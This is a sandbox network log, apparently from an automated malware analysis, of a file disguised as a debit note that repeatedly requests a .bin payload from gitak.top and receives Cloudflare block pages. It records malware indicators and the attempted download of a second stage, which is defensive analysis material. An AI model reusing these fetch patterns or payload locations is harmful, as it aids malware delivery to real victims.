2024-08-26 13:38:32 UTC	535	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:38:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jSHOGbnUJyzMuiz4mdD9Fx1SosZZ45ci6ZqbDMDOLo25GSuSowpFT4ekfUBMtG42ytFX%2FvxGtcFzymkHIdgBbyPlWBCdClcR46MaC6a1D1HPqC6x6UblvVvI9wI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943909789dc57b-IAD
2024-08-26 13:38:32 UTC	834	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:38:32 UTC	1369	IN	Data Raw: 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20 Data Ascii: " /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:38:32 UTC	1369	IN	Data Raw: 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 4f 68 6c 32 41 66 4f 69 37 6a 75 6d 32 63 43 74 53 38 41 4f 68 6a 6d 62 68 5a 68 6d 68 69 4e 33 72 53 63 6c 7a 59 34 6b 5f 32 41 2d 31 37 32 34 36 37 39 35 31 32 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 Data Ascii: ut type="hidden" name="atok" value="Ohl2AfOi7jum2cCtS8AOhjmbhZhmhiN3rSclzY4k_2A-1724679512-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="
2024-08-26 13:38:32 UTC	846	IN	Data Raw: 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f Data Ascii: idden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></
2024-08-26 13:38:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.11.20	49854	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:38:42 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:38:43 UTC	541	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:38:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j1%2B5MXVbnXxFgKu9dejjMXzX1AHNT6SaJ3Y1iUE0su6gxOQlNUQ4%2FrGrCHg7MTuYtoVZOgQE%2FONJGZdXk3tXI6mbjQd%2FgVdyTN6fYMNVHDNKJqWsRZTKBhnDSkI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94394b0e019c2b-IAD
2024-08-26 13:38:43 UTC	828	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:38:43 UTC	1369	IN	Data Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
2024-08-26 13:38:43 UTC	1369	IN	Data Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 72 4a 38 49 6d 33 4f 48 51 38 50 36 63 35 62 71 36 39 73 41 39 32 55 4c 69 2e 47 79 44 63 31 54 72 33 33 57 4d 50 58 5f 33 4b 4d 2d 31 37 32 34 36 37 39 35 32 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 Data Ascii: <input type="hidden" name="atok" value="rJ8Im3OHQ8P6c5bq69sA92ULi.GyDc1Tr33WMPX_3KM-1724679523-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
2024-08-26 13:38:43 UTC	852	IN	Data Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 Data Ascii: r sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
2024-08-26 13:38:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.11.20	49855	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:38:53 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:38:53 UTC	547	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:38:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StYHORHP1oFP%2BShKyFIml7AwiFR6wkbu5p9WfGjKm3fEyA%2FTt%2FX6zS%2F8xAtScoHqL%2FpJuO85FPZrtMbWx4SAl3VZVdByjXscoDGRg48w78Lx6bdM2wnjpYfo%2F%2F0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94398c9d6a3b24-IAD
2024-08-26 13:38:53 UTC	822	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:38:53 UTC	1369	IN	Data Raw: 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 Data Ascii: rrors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-a
2024-08-26 13:38:53 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 71 72 61 47 59 6a 79 54 42 70 50 66 4b 4c 37 65 69 6a 73 70 42 4d 6a 54 65 62 57 52 47 55 6a 6b 48 36 55 33 46 47 67 65 46 75 59 2d 31 37 32 34 36 37 39 35 33 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d Data Ascii: <input type="hidden" name="atok" value="qraGYjyTBpPfKL7eijspBMjTebWRGUjkH6U3FGgeFuY-1724679533-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-
2024-08-26 13:38:53 UTC	858	IN	Data Raw: 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 Data Ascii: parator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Clou
2024-08-26 13:38:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.11.20	49856	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:39:03 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:39:04 UTC	537	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:39:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wi9YmFYAiozCiWwHzCv4USfurhhldaD9%2FsLY9bHcwslxBwO9Ia3KQl1m4hM5qU74B8CMB5hDbo9izlVaz8%2Fs0i4Vk6z8znrzST6og4DTQ8pRJfRVFs2Inr7czPs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9439ce39e12d18-IAD
2024-08-26 13:39:04 UTC	832	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:39:04 UTC	1369	IN	Data Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:39:04 UTC	1369	IN	Data Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 56 44 39 72 75 4c 6f 77 53 65 48 37 71 68 63 76 33 4b 57 39 76 57 33 62 68 63 33 36 54 64 6a 53 74 4e 55 6b 59 65 56 5f 71 6a 34 2d 31 37 32 34 36 37 39 35 34 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 Data Ascii: nput type="hidden" name="atok" value="VD9ruLowSeH7qhcv3KW9vW3bhc36TdjStNUkYeV_qj4-1724679544-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
2024-08-26 13:39:04 UTC	848	IN	Data Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e Data Ascii: :hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
2024-08-26 13:39:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.11.20	49857	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:39:14 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
